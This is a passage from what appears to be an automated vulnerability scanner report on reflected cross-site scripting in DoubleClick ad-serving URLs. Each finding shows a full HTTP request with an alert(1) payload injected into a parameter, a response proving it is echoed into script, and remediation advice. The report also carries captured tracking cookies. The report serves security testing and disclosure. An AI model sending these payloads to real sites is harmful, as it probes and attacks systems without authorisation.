GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=12bd2"-alert(1)-"84fa1176aee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8167
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:06:23 GMT
Expires: Wed, 11 May 2011 15:06:23 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Y2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=12bd2"-alert(1)-"84fa1176aeehttp://www.tdameritrade.com/offer/250trades/index.html?a=APA&o=199&cid=GENRET;877237;62578502;239944485;41633482");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

5.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f7d"-alert(1)-"3611faec125 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQd8f7d"-alert(1)-"3611faec125&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:03:49 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQd8f7d"-alert(1)-"3611faec125&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyN
...[SNIP]...

5.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17a2b"-alert(1)-"8af5856fbe4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-967494200934580717a2b"-alert(1)-"8af5856fbe4&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:05:51 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
XVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-967494200934580717a2b"-alert(1)-"8af5856fbe4&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpk
...[SNIP]...

5.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ea22"-alert(1)-"9ecabccf172 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=14ea22"-alert(1)-"9ecabccf172&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:04:28 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
hcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=14ea22"-alert(1)-"9ecabccf172&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2
...[SNIP]...

5.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6622f"-alert(1)-"031dd620da0 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw6622f"-alert(1)-"031dd620da0&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:05:12 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw6622f"-alert(1)-"031dd620da0&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqi
...[SNIP]...

5.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c64"-alert(1)-"664178a7c45 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=lf3c64"-alert(1)-"664178a7c45&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:03:20 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
et/click%3Bh%3Dv8/3b04/f/31a/%2a/d%3B239944485%3B0-0%3B0%3B62578502%3B2321-160/600%3B41633482/41651269/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=lf3c64"-alert(1)-"664178a7c45&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1
...[SNIP]...

5.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84c68"-alert(1)-"169a8ab34c5 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034084c68"-alert(1)-"169a8ab34c5&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:14 GMT
Content-Length: 10042

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=8034084c68"-alert(1)-"169a8ab34c5&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectU
...[SNIP]...

5.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 526cf"-alert(1)-"81137346fbf was submitted in the crID parameter. This input was echoed unmodified in the application's response.

